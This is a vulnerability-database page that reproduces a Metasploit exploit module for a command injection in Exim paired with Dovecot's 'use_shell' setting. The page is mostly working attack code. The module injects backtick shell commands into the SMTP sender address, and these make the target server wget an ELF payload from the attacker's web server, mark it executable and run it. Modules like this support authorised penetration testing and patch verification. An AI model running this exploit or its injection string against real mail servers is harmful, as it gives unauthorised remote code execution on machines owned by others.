Lucene search
K

Exim and Dovecot Insecure Configuration Command Injection

🗓️ 07 Jun 2013 22:59:04Reported by Unknown, eKKiM, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 107 Views

Exim and Dovecot Insecure Configuration Command Injection. Exploits command injection vulnerability using the "use_shell" option in Dovecot with Exim, successfully tested on Debian Squeeze with default packages

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Smtp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper


  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Exim and Dovecot Insecure Configuration Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability against Dovecot with
        Exim using the "use_shell" option. It uses the sender's address to inject arbitrary
        commands, since this is one of the user-controlled variables. It has been
        successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common
        packages.
      },
      'Author'         =>
        [
          'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
          'eKKiM', # PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '93004' ],
          [ 'EDB', '25297' ],
          [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
        ],
      'Privileged'     => false,
      'Arch'           => ARCH_X86,
      'Platform'       => 'linux',
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Linux x86', { }],
        ],
      'DisclosureDate' => '2013-05-03',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', '[email protected]']),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ])

      register_advanced_options(
      [
        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
      ])

      deregister_options('MAILFROM')
  end

  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  def exploit

    @pl = generate_payload_exe
    @elf_sent = false

    #
    # start our web server to deploy the final payload
    #
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    resource_uri = '/' + downfile

    if (datastore['DOWNHOST'])
      service_url_payload = datastore['DOWNHOST'] + resource_uri
    else

      # Needs to be on the port 80
      if datastore['SRVPORT'].to_i != 80
        fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end

      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      service_url_payload = srv_host + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      },
      'ssl' => false # do not use SSL
    })

    end


    connect

    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
      disconnect
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
    end

    ehlo = datastore['EHLO']
    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
    ehlo_resp.each_line do |line|
      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
    end

    #
    # Initiate the message
    #
    filename = rand_text_alpha_lower(8)
    from = rand_text_alpha(3)
    from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`"
    from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
    from << "`/tmp/#{filename}`"
    from << "@#{ehlo}"
    to   = datastore['MAILTO']

    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
    resp ||= 'no response'
    msg = "MAIL: #{resp.strip}"
    if not resp or resp[0,3] != '250'
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
    else
      print_status("#{rhost}:#{rport} - #{msg}")
    end

    resp = raw_send_recv("RCPT TO: #{to}\r\n")
    resp ||= 'no response'
    msg = "RCPT: #{resp.strip}"
    if not resp or resp[0,3] != '250'
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
    else
      print_status("#{rhost}:#{rport} - #{msg}")
    end

    resp = raw_send_recv("DATA\r\n")
    resp ||= 'no response'
    msg = "DATA: #{resp.strip}"
    if not resp or resp[0,3] != '354'
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
    else
      print_status("#{rhost}:#{rport} - #{msg}")
    end

    message = "Subject: test\r\n"
    message <<  "\r\n"
    message << ".\r\n"

    resp = raw_send_recv(message)
    msg = "DELIVER: #{resp.strip}"
    if not resp or resp[0,3] != '250'
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
    else
      print_status("#{rhost}:#{rport} - #{msg}")
    end
    disconnect

    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation